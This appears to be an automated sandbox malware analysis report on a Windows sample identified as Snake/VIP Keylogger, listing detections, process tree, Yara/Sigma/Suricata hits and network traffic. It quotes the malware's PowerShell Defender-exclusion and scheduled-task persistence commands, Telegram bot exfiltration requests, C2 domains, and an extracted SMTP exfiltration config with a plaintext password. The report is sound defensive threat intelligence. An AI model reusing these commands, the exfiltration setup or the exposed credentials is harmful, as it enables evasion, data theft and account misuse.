Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2i3Lj7a8Gk.exe

Overview

General Information

Sample name:2i3Lj7a8Gk.exe
renamed because original name is a hash value
Original sample name:953b66b361820b31e028c6eae7f14a8b57ca6dd231baae5045abbaf7455ab6f3.exe
Analysis ID:1527690
MD5:4cf3e3ad3bbfaf2b2950f501466fefb7
SHA1:32a330bd302d266d201621afa6b624a8e3aa6e04
SHA256:953b66b361820b31e028c6eae7f14a8b57ca6dd231baae5045abbaf7455ab6f3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2i3Lj7a8Gk.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe" MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
    • powershell.exe (PID: 5768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3288 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 2i3Lj7a8Gk.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe" MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
  • lyNyKapwZJLKnn.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
    • schtasks.exe (PID: 7468 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lyNyKapwZJLKnn.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe" MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
    • lyNyKapwZJLKnn.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe" MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
    • lyNyKapwZJLKnn.exe (PID: 7540 cmdline: "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe" MD5: 4CF3E3AD3BBFAF2B2950F501466FEFB7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@precioustouchfoundation.org", "Password": "Pr3c!0Us2007", "Host": "mail.precioustouchfoundation.org", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@precioustouchfoundation.org", "Password": "Pr3c!0Us2007", "Host": "mail.precioustouchfoundation.org", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e4d9:$a1: get_encryptedPassword
          • 0x2e7f6:$a2: get_encryptedUsername
          • 0x2e2e9:$a3: get_timePasswordChanged
          • 0x2e3f2:$a4: get_passwordField
          • 0x2e4ef:$a5: set_encryptedPassword
          • 0x2fb92:$a7: get_logins
          • 0x2faf5:$a10: KeyLoggerEventArgs
          • 0x2f75a:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          13.2.lyNyKapwZJLKnn.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            13.2.lyNyKapwZJLKnn.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2ed3a:$s1: UnHook
            • 0x2ed41:$s2: SetHook
            • 0x2ed49:$s3: CallNextHook
            • 0x2ed56:$s4: _hook
            7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  Click to see the 35 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe", ParentImage: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, ParentProcessId: 6360, ParentProcessName: 2i3Lj7a8Gk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", ProcessId: 5768, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe", ParentImage: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, ParentProcessId: 6360, ParentProcessName: 2i3Lj7a8Gk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", ProcessId: 5768, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe, ParentImage: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe, ParentProcessId: 7260, ParentProcessName: lyNyKapwZJLKnn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp8686.tmp", ProcessId: 7468, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 68.66.224.41, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, Initiated: true, ProcessId: 7180, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50126
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe", ParentImage: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, ParentProcessId: 6360, ParentProcessName: 2i3Lj7a8Gk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", ProcessId: 3288, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe", ParentImage: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, ParentProcessId: 6360, ParentProcessName: 2i3Lj7a8Gk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe", ProcessId: 5768, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\2i3Lj7a8Gk.exe", ParentImage: C:\Users\user\Desktop\2i3Lj7a8Gk.exe, ParentProcessId: 6360, ParentProcessName: 2i3Lj7a8Gk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp", ProcessId: 3288, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-07T08:51:21.294932+020028033053Unknown Traffic192.168.2.449736188.114.96.3443TCP
                  2024-10-07T08:51:24.110935+020028033053Unknown Traffic192.168.2.449742188.114.96.3443TCP
                  2024-10-07T08:51:25.444864+020028033053Unknown Traffic192.168.2.449746188.114.96.3443TCP
                  2024-10-07T08:51:26.714920+020028033053Unknown Traffic192.168.2.449750188.114.96.3443TCP
                  2024-10-07T08:51:27.946696+020028033053Unknown Traffic192.168.2.449753188.114.96.3443TCP
                  2024-10-07T08:51:29.222035+020028033053Unknown Traffic192.168.2.449757188.114.96.3443TCP
                  2024-10-07T08:51:29.280345+020028033053Unknown Traffic192.168.2.449758188.114.96.3443TCP
                  2024-10-07T08:51:30.604522+020028033053Unknown Traffic192.168.2.449762188.114.96.3443TCP
                  2024-10-07T08:51:31.916052+020028033053Unknown Traffic192.168.2.449765188.114.96.3443TCP
                  2024-10-07T08:51:33.222156+020028033053Unknown Traffic192.168.2.449769188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-07T08:51:19.642490+020028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                  2024-10-07T08:51:20.903264+020028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP
                  2024-10-07T08:51:22.095609+020028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
                  2024-10-07T08:51:23.986288+020028032742Potentially Bad Traffic192.168.2.449741132.226.247.7380TCP
                  2024-10-07T08:51:24.876852+020028032742Potentially Bad Traffic192.168.2.449741132.226.247.7380TCP
                  2024-10-07T08:51:26.173750+020028032742Potentially Bad Traffic192.168.2.449748132.226.247.7380TCP
                  2024-10-07T08:51:27.439405+020028032742Potentially Bad Traffic192.168.2.449752132.226.247.7380TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@precioustouchfoundation.org", "Password": "Pr3c!0Us2007", "Host": "mail.precioustouchfoundation.org", "Port": "587", "Version": "4.4"}
                  Source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@precioustouchfoundation.org", "Password": "Pr3c!0Us2007", "Host": "mail.precioustouchfoundation.org", "Port": "587"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeReversingLabs: Detection: 79%
                  Multi AV Scanner detection for submitted file
                  Source: 2i3Lj7a8Gk.exeReversingLabs: Detection: 79%
                  Source: 2i3Lj7a8Gk.exeVirustotal: Detection: 41%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: 2i3Lj7a8Gk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: 2i3Lj7a8Gk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: OQhQ.pdb source: 2i3Lj7a8Gk.exe, lyNyKapwZJLKnn.exe.0.dr
                  Source: Binary string: OQhQ.pdbSHA256 source: 2i3Lj7a8Gk.exe, lyNyKapwZJLKnn.exe.0.dr
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 02F0F45Dh6_2_02F0F2C0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 02F0F45Dh6_2_02F0F4AC
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 02F0FC19h6_2_02F0F970
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF31E0h6_2_06CF2DC8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF0D0Dh6_2_06CF0B30
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF1697h6_2_06CF0B30
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF2C19h6_2_06CF2968
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFE959h6_2_06CFE6B0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFE0A9h6_2_06CFDE00
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFF209h6_2_06CFEF60
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFCF49h6_2_06CFCCA0
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF31E0h6_2_06CF2DC2
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFD7F9h6_2_06CFD550
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFE501h6_2_06CFE258
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFF661h6_2_06CFF3B8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFEDB1h6_2_06CFEB08
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFD3A1h6_2_06CFD0F8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06CF0040
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFFAB9h6_2_06CFF810
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CFDC51h6_2_06CFD9A8
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 4x nop then jmp 06CF31E0h6_2_06CF310E
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 4x nop then jmp 0114F45Dh13_2_0114F2C0
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 4x nop then jmp 0114F45Dh13_2_0114F52F
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 4x nop then jmp 0114F45Dh13_2_0114F4AC
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeCode function: 4x nop then jmp 0114FC19h13_2_0114F961

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:50126 -> 68.66.224.41:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:26:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2014:46:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
